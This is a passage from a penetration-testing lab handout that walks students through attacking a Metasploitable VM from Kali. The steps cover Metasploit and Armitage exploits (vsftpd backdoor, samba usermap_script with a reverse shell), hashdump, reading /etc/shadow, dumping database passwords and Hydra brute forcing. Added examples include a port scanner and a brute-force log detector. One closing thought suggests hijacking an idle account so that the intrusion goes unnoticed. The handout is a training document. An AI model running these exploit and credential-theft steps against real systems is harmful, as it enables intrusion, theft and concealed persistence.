8b. Type: info auxiliary/scanner/http/owa_login

8c. Who wrote the module? (See the Author field in the info output.)

9. What is the pcanywhere_login module good for?

9a. Type: search type:auxiliary pcanywhere_login

9b. Type: info auxiliary/scanner/pcanywhere/pcanywhere_login

Now let's learn how to use the "info" command to gather information about modules.

10. Type: info auxiliary/scanner/mssql/mssql_ping

10a. What does this module do?

Now let's look at everyone's favorite scanner Nmap. Nmap is a tool every pen tester, system administrator, network administrator, etc, should be familiar with.

*If you currently have a module loaded type: back

1. Type "nmap". Notice the exhaustive output. The switch syntax is given along with a description of the command.

2. Type: nmap -sT x.x.x.x (x.x.x.x is the IP address of the Metasploitable VM. -sT is a full TCP connect scan: it completes the three-way handshake on each port, so it needs no raw-socket privileges but is also the noisiest option in the target's logs.)

2a. What were some of your findings?

3. Now that we've used Nmap to find and scan a host let's see if we can connect.

4. At the msf console type: connect -h

4a. View the options.

5. To verify a port is open on your target and that you can reach it, type: connect -z x.x.x.x 21 (The -z switch only completes the TCP connection and returns, without interacting.) This connects you to the FTP port on your target system, if the FTP service is running and nothing in between is filtering it.

5a. Go ahead and see if you are able to connect to the target using the above command. What are the results.

6. Now that you know the FTP port is open you can search for exploits. Type: search platform:linux type:exploit ftp

6a. List two exploits.

We've explored scanning with Metasploit by searching for multiple scanner modules, loading them, and exploring their functions. We also used an industry favorite, Nmap, to target our victim VM. We connected to an open port to confirm connectivity and then looked up available exploits in the Metasploit database. In the labs ahead we'll be using the information we've gathered to continue looking up exploits and leveraging them against vulnerabilities.
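Both nmap -sT and msfconsole's connect -z do the same thing at the wire: complete a TCP handshake and report the outcome. The Python below is an added example, not nmap's or Metasploit's code; it writes that out as a small connect scanner that also reads the service banner, and distinguishes a refused connection (closed) from silence (filtered). The loopback FTP listener is constructed so it runs offline; to use it for real, point connect_scan at the Metasploitable IP you recorded, and only at hosts you are authorised to test.

```python
"""TCP connect scan with banner grab: what `nmap -sT` and msfconsole's
`connect -z` do, written out in Python.

Added example, not code from nmap, Metasploit or the handout. The loopback
listener is constructed so the script runs offline.
"""
import socket
import threading
from typing import Dict, Optional, Tuple

Result = Tuple[str, Optional[str]]   # (state, banner)


def probe_port(host: str, port: int, timeout: float = 1.0) -> Result:
    """Full connect (SYN, SYN/ACK, ACK) and read whatever the service says first.

    'closed' means the host answered with RST (connection refused);
    'filtered' means no answer within the timeout, usually a firewall drop.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                banner = s.recv(256).decode("latin-1").strip() or None
            except socket.timeout:
                banner = None       # open, but the service waits for us to talk first
            return "open", banner
    except ConnectionRefusedError:
        return "closed", None
    except OSError:                 # timeout, unreachable, etc.
        return "filtered", None


def connect_scan(host: str, ports, timeout: float = 1.0) -> Dict[int, Result]:
    return {port: probe_port(host, port, timeout) for port in ports}


def start_fake_ftp(banner: bytes = b"220 constructed lab FTP banner\r\n"):
    """Loopback listener standing in for a target's port 21. Returns (port, stop)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))      # port 0: let the OS pick a free port
    srv.listen(5)
    srv.settimeout(0.2)
    port = srv.getsockname()[1]
    stop = threading.Event()

    def serve():
        while not stop.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                conn.sendall(banner)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, stop.set


def unused_port() -> int:
    """Grab and release an ephemeral port so we have one nobody listens on."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo() -> Tuple[int, int, Dict[int, Result]]:
    """Scan one listening and one closed loopback port; returns (open, closed, results)."""
    open_port, stop = start_fake_ftp()
    closed_port = unused_port()
    try:
        return open_port, closed_port, connect_scan("127.0.0.1", [open_port, closed_port])
    finally:
        stop()


if __name__ == "__main__":
    for port, (state, banner) in demo()[2].items():
        print(f"{port}/tcp {state} {banner or ''}")
```

The banner is the same string nmap's -sV uses as its first clue, which is why a service that announces its version in its greeting (FTP and SSH both do) is the easiest one to fingerprint.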

Part 6: Armitage Lab

1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. DO NOT LAUNCH METASPLOIT

4. Type: service postgresql start

5. Launch your Metasploitable VM.

6. At the user logon prompt type: msfadmin

7. At the password prompt type: msfadmin

8. Type: ifconfig

9. Record the IP address here:

Armitage is described as a "cyber attack management tool". Armitage is a GUI for Metasploit. It does not replace Metasploit but it does provide a way to visualize your targets. It also makes the use of Metasploit collaborative by being able to support more than one user at the same time. Armitage has other features such as suggestions. While Armitage is heavily integrated with Metasploit it does not entirely replace the command line so the command line is still available from within the GUI. We will explore the use of Armitage in this lab to gain a better understanding of its capabilities as a penetration testing tool.

1. Using the shell you already have open in your Kali VM type: armitage

2. Click "Connect" at the first prompt and then "Yes" to start the service that connects to the Metasploit database. (Accept the defaults. Do not change the IP address from 127.0.0.1.)

3. Click "Hosts-Add Hosts" and enter the IP of your Metasploitable VM.

4. (ONLY DO THIS IF YOU HAVE UNWANTED HOSTS.) Remove any unwanted hosts that populate from the Metasploit database from previous scans. Right-click on the unwanted host and select "Host-Remove Host".

5. Look at the "Console" tab at the bottom left of the screen. Type "hosts" at the msf prompt and hit Enter. What is the result?

6. Type: services. What is the result?

5. Right-click on the Metasploitable host computer icon in the top-right frame and select "Scan". This triggers multiple scans. Module after module is loaded and run, and the results are automatically written to the Metasploit db.

a. What scan launches first?

b. What does it find?

c. What FTP version is running?

d. What SSH version is running?

e. What version of web server is running and on what OS?

f. What Windows/Linux domain integration and file server software is running?

g. What version of MySQL is running?

h. What version of Postgres is running?

6. Wait until all of the scans have completed and then go to the "Attacks" menu at the top of the Armitage window. Select "Find Attacks" and wait for a prompt confirming attacks have been added. This can take up to 10 minutes. Be patient and wait for the prompt.

7. Right-click on your target and notice "Attack" has been added to the menu.

8. Right-click on your target and select "Attack-FTP-vsftpd_234_backdoor". Accept defaults and click "Launch". If that attack doesn't work then click on "Attacks-Hail Mary".

9. Once the Linux box has turned red and appears to have lightning around it click within the "Console" tab at the bottom left of your screen.

Type: sessions

a. What IP are you connected to?

b. What type of connection do you have?

9. Right-click on the compromised target and select "Shell 1-Post Modules".

10. Select the "hashdump" post module from the tree in the left-hand pane by double-clicking on it. (You will have to scroll down. It's under "gather".) Go with the defaults and click "Launch". What information populated in the new tab?

11. Go to the "View" menu. Select "Loot". What is the Loot tab telling you?

12. Now let's enumerate the system with Armitage. In the top left window pane navigate to "post-linux-gather" and select the enum_system post module by double-clicking on it. What types of information were gathered?

13. Go to "View" and select "loot".

a. What was added to your loot?

b. What is it possible to do with your loot?

c. What should you do next?

14. Right-click on the compromised target and select "Shell 1-Interact".

15. Type: whoami

15a. Who are you logged in as?

16. Type: pwd

16a. What is the present working directory?

17. Type: ls

18. Type: adduser bob

18a. Follow the prompts to create a new user on your target. If you are continuously prompted for bob's information skip to step 19.

19. Click on the Console tab at the very left of the bottom pane. Type "sessions -K" to kill all sessions.

20. Switch to your Metasploitable VM.

21. Type: exit

22. Log in with the user account "bob" and enter your password.

Final thoughts: Notice under the "Hosts" menu you have many important scanning options: Nmap, MSF Scans, DNS Enumeration. Try using them against your target. Armitage is a fun and useful tool for quickly throwing exploits at systems to see what sticks and then playing with post modules in a controlled environment. It's also a fantastic way to visualize all of your compromised systems, which is especially important when you have a lot of them. You also have the ability to pass off sessions to your coworkers if you so choose, further strengthening the advantages of this unique and powerful open source penetration testing tool.

Part 7: Database Attack Lab

This lab will follow a database penetration test from beginning to end in order to illustrate, in a hands-on way, the steps necessary to fully compromise a database. You will use a Metasploit module to identify an account you may use to log in. Once logged in you will use SQL commands to explore the database.

1. If Metasploitable isn't already running launch the Metasploitable VM.

2. At the user logon prompt type: msfadmin

3. At the password prompt type: msfadmin

4. Type: ifconfig

5. Record the IP address here:

6. Now switch to Kali.

7. Open a shell by clicking on the black box next to the word "Places".

a. Type: service postgresql start
b. Type: service metasploit start
c. Type: service metasploit stop

8. Type: msfconsole

9. Scan your target for database technologies. Try to identify running database services on your target's ports. Type: nmap x.x.x.x

10. Success! We've identified multiple instances of database technologies running on our target. Let's choose a service to target. For this example we'll select MySQL.

11. Metasploit has multiple MySQL exploits. Type: search mysql

12. Type: use auxiliary/scanner/mysql/mysql_login

13. Type: info

14. Type: set rhosts x.x.x.x (IP of Metasploitable VM.)

15. Type: set username root

16. Type: set stop_on_success true

17. Let's confirm the changes you made took. Type: info

18. Type: exploit

19. You determined the username root has no password. Congratulations. Let's test our access to the MySQL database.

20. Open a new shell by clicking on the black box to the right of the word "Places".

21. Type: mysql -h x.x.x.x (IP of Metasploitable.) -u root

22. Type: show databases;

23. Let's pick a database and explore it. Type: use dvwa;

24. Now that we've picked a database let's view the tables. Type: show tables;

25. Let's see what data is being held in this table. Type: show columns from users;

26. Columns of interest are "user" and "password". Type: select user, password from users;

27. You've successfully scanned for a database technology, found a vulnerable database service running on a target's port, located the appropriate module and ran it. Now try exploiting a different database vulnerability, such as PostgreSQL.

Congratulations, you've used a Metasploit module to attack a database. You've accessed a database, enumerated the tables, identified fields of interest, and inspected their contents.

Part 8: Network Attack Lab

In this lab we will explore Metasploit network share exploitation.

28. If Metasploitable isn't already running launch the Metasploitable VM.

29. At the user logon prompt type: msfadmin

30. At the password prompt type: msfadmin

31. Type: ifconfig

32. Record the IP address here:

33. Now switch to Kali.

34. Open a shell by clicking on the black box next to the word "Places".

35. Let's look for network share technologies in use. Type: nmap -A -p 139,445 x.x.x.x (IP of Metasploitable.)

We've gathered information on the network share technology being used. Now let's launch Metasploit and use the relevant attack modules to exploit vulnerabilities in the network sharing technology we've identified.

36. Launch Metasploit. Type: msfconsole

37. Let's search Metasploit's database for samba exploits. Type: search samba

38. Type: use exploit/multi/samba/usermap_script

39. Type: info

40. Type: set rhost x.x.x.x (IP of Metasploitable VM.)

41. Type: set payload cmd/unix/reverse

42. Type: set lhost x.x.x.x (Your IP.)

43. Let's confirm the changes you made took. Type: info

44. Type: exploit

45. Type: whoami

46. Type: pwd

47. Type: cat /etc/shadow

48. Type: cat /etc/passwd

Mission accomplished!

Closing thought: "whoami" returned "root". You could create an account and set its password, or you could use the "passwd" command to change the password on an account that hasn't recently been used. That way, if the /etc/passwd or /etc/shadow files are examined, no new accounts would be identified. The possibilities are only limited by your imagination.

Part 9: Password Brute Forcing Lab

1. Open VMware Player and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".

3. Open another instance of VMware Player and launch the Metasploitable VM.

4. At the user logon prompt type: msfadmin

5. At the password prompt type: msfadmin

6. Type: ifconfig

7. Record the IP address here:

Hydra is a password brute forcing tool that supports many protocols. These are just a few of them: Samba, Cisco, IMAP, POP3, FTP, LDAP, Telnet, HTTP Auth, VNC, MySQL, NNTP, SNMP.

Let's look at Hydra's options.

1. Switch your focus to the Kali VM and, using the shell you already opened, type: hydra

1a. Observe the commands available to configure Hydra.

We need wordlists to perform our brute forcing.

2. Type: cd /usr/share/wordlists

The wordlist we want is zipped up to save space. Let's unzip it.

3. Type: gunzip rockyou.txt.gz

Now let's use Hydra.

4. Type: hydra -l ftp -P /usr/share/wordlists/rockyou.txt -f -v x.x.x.x (target IP address) ftp

4a. What is/are the password(s) to the ftp user account?

Let's test our findings.

5. Type: ftp x.x.x.x (IP of Metasploitable)

6. Type the username you found.

7. Type the password you found.

Confirm you have logged in.

8. Type: quit

As you can see, Hydra is a powerful password brute forcing tool. Some applications of this tool are readily obvious. Hydra may be used to test systems over the internet such as MySQL databases or Cisco devices.
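A defender-side counterpart to the brute-force exercise above, added here and not part of the original lab: the script counts failed FTP logins per client address in a constructed log excerpt and flags sources that cross a threshold, singling out those that eventually logged in. The log lines are modelled on vsftpd's "FAIL LOGIN" / "OK LOGIN" entries, which is an assumption about the format; the pattern is the only thing to adjust for another server.

```shell
#!/bin/sh
# Added example, not part of the original lab: spot password guessing against
# an FTP service from its log. The lines below are CONSTRUCTED in the style of
# vsftpd's "FAIL LOGIN" / "OK LOGIN" entries (format assumed; adjust the sed
# pattern if your server logs differently). 192.0.2.10 fails five times and
# then succeeds, the trail a guessing run that stops at its first hit leaves.

SAMPLE_LOG='Tue Mar 10 10:00:01 2020 [pid 2311] [ftp] FAIL LOGIN: Client "192.0.2.10"
Tue Mar 10 10:00:01 2020 [pid 2313] [ftp] FAIL LOGIN: Client "192.0.2.10"
Tue Mar 10 10:00:02 2020 [pid 2315] [ftp] FAIL LOGIN: Client "192.0.2.10"
Tue Mar 10 10:00:02 2020 [pid 2317] [ftp] FAIL LOGIN: Client "192.0.2.10"
Tue Mar 10 10:00:03 2020 [pid 2319] [ftp] FAIL LOGIN: Client "192.0.2.10"
Tue Mar 10 10:00:03 2020 [pid 2321] [ftp] OK LOGIN: Client "192.0.2.10"
Tue Mar 10 10:05:00 2020 [pid 2400] [ftp] FAIL LOGIN: Client "198.51.100.7"
Tue Mar 10 10:06:00 2020 [pid 2402] [ftp] OK LOGIN: Client "198.51.100.7"'

# count_failed_logins: read log text on stdin; print "<count> <client ip>",
# highest count first.
count_failed_logins() {
    grep 'FAIL LOGIN: Client' \
      | sed -n 's/.*Client "\([^"]*\)".*/\1/p' \
      | sort | uniq -c | sort -rn \
      | awk '{ print $1, $2 }'
}

# flag_bruteforce THRESHOLD: read log text on stdin; print client IPs whose
# failed-login count is at least THRESHOLD.
flag_bruteforce() {
    count_failed_logins | awk -v t="$1" '$1 >= t { print $2 }'
}

# success_after_failures THRESHOLD: read log text on stdin; print flagged IPs
# that later logged in successfully. A guess that finally worked is the case
# to escalate (reset that account's password), not merely rate-limit.
success_after_failures() {
    log="$(cat)"
    for ip in $(printf '%s\n' "$log" | flag_bruteforce "$1"); do
        if printf '%s\n' "$log" | grep -qF "OK LOGIN: Client \"$ip\""; then
            echo "$ip"
        fi
    done
}

echo "Failed logins per client:"
printf '%s\n' "$SAMPLE_LOG" | count_failed_logins
echo "Clients with at least 5 failures that then logged in:"
printf '%s\n' "$SAMPLE_LOG" | success_after_failures 5
```

On a real host, replace the constructed sample with `cat /var/log/vsftpd.log | success_after_failures 5` (path is the usual vsftpd default, an assumption for other setups).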

But what about offline password cracking? John the Ripper is a popular password cracking tool. It cracks password hashes offline, meaning you've gathered the password hashes from sources such as a Windows SAM file or a Linux shadow file and you are now going to run John the Ripper against those password hash files. To learn more about John the Ripper type: john

Linux Audit Script Tutorial

You are going to create a Linux audit script. This short tutorial demonstrates how to create an audit script, execute it, and read the contents of the file it creates.

Open your Kali Linux VM. Launch a shell.

Type: nano

Enter this information:

===BEGIN SCRIPT===

#!/bin/sh
# Collect a quick baseline of the host into a single report file.

AUDIT_RESULTS="/tmp/audit_results"

# Only the first redirect uses ">" (start a fresh report); every later line
# must use ">>" so each section is appended instead of overwriting the file.
echo "===OPERATING SYSTEM & KERNEL INFORMATION===" > "$AUDIT_RESULTS"

uname -a >> "$AUDIT_RESULTS"

echo "===SYSTEM RESOURCE USAGE===" >> "$AUDIT_RESULTS"
free >> "$AUDIT_RESULTS"

echo "===CURRENTLY LOGGED ON USER===" >> "$AUDIT_RESULTS"
w >> "$AUDIT_RESULTS"

echo "===LAST LOGON===" >> "$AUDIT_RESULTS"
last >> "$AUDIT_RESULTS"

echo "===ACCOUNTS===" >> "$AUDIT_RESULTS"
cat /etc/passwd >> "$AUDIT_RESULTS"

echo "===DRIVE SPACE===" >> "$AUDIT_RESULTS"
df -h >> "$AUDIT_RESULTS"

===END SCRIPT===

Press: "ctrl+x" and save the file with the name "linux.audit".

To make the script executable type: chmod u+x linux.audit

To run the script type: ./linux.audit

To read the script output type: cat /tmp/audit_results

Part 10: Windows Baseline Audit Script Lab

This lab provides a real-world hands-on example of performing a baseline audit of a Windows system. In this lab you will use wmic and batch commands to query a Windows system for installed software, NICs, startup items, boot list, disk drives, environment variables, jobs, logons, network protocols, mapped drives, type of OS, installed hotfixes, running servers, shares, installed hardware, running services, user accounts, security groups, running processes, TCP/UDP connections, NetBIOS connections, system information, and scheduled tasks. As you can see, this basic baseline script captures a great deal of information for an auditor.

There are two reasons this baseline script uses basic wmic and batch file commands. The first is that any Windows system is able to run it: there are no dependencies to install. The second is that even the most sensitive Windows systems, such as those configured for a single purpose like controllers or instruments, will not lock up or crash when the script is run. Be aware, however, that the script may considerably slow down a system that is already using most of its resources for other operations, so execute it with caution.

1. Right-click on the file titled "baseline.bat" and select "edit". Notice the wmic commands and batch file commands being used to query the Windows system. Now close the file.

2. Right-click on the file titled "baseline.bat" and select "Run as administrator".

3. A command prompt should have opened.

4. Press these buttons: ctrl+alt+del

5. Click: "Select Task Manager"

6. Click on the tab labeled: "Performance"

7. Click on the button labeled: "Resource Monitor"

8. Observe the resources being consumed, specifically, observe the CPU usage. What is taking up the most average CPU time?

9. Wait for the script to finish running. When the script is finished running you should have two documents. One titled "baseline.html" and another titled "baseline.txt".

10. Open the document "baseline.html" and scroll through it.

11. Open the document "baseline.txt" and scroll through it.

You now have an audit script to take with you and use during audits.

All rights reserved! Copyrights ©2019-2020 ExpertsMind IT Educational Pvt Ltd